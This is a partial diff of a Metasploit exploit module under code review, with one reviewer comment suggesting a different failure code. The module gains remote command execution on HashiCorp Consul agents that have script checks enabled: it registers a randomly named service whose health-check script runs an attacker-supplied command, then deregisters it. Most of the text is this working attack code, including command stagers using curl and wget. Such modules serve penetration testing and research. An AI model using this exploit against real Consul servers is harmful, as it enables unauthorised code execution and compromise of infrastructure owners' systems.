modules/exploits/multi/misc/consul_service_exec.rb

```diff
@@ -0,0 +1,131 @@
+          [ 'URL', 'https://github.com/torque59/Garfield' ]
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => {},
+      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 11 2018'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+        Opt::RPORT(8500)
+      ])
+  end
+
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, "/v1/agent/self"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+    begin
+      agent_info = JSON.parse(res.body)
+      if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    rescue JSON::ParserError
+      vprint_error 'Failed to parse JSON output.'
+      return CheckCode::Unknown
+    end
+  end
+
+
+  def execute_command(cmd, opts = {})
+    uri = target_uri.path
+    service_name = Rex::Text.rand_text_alpha(5)
+    print_status("Creating service '#{service_name}'")
+
+    # NOTE: Timeout defines how much time the check script will run until
+    # getting killed. Arbitrarily set to one day for now.
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        :ID => "#{service_name}",
+        :Name => "#{service_name}",
+        :Address => "127.0.0.1",
+        :Port => 80,
+        :check => {
+          :script => "#{cmd}",
+          :interval => "10s",
+          :Timeout => "86400s"
+        }
+      }.to_json
+    })
+    if res and res.code == 200
+      begin
+        print_status("Service '#{service_name}' successfully created.")
+      rescue JSON::ParseError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+    print_status("Waiting for service '#{service_name}' script to trigger")
+    sleep(12)
+    print_status("Removing service '#{service_name}'")
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(
+        uri,
+        "v1/agent/service/deregister/#{service_name}"
+      ),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+    if res and not res.code == 200
+      fail_with(Failure::Unknown,
```

Comment:
`Failure::UnexpectedReply` might be more appropriate?

```suggestion
      fail_with(Failure::UnexpectedReply,
```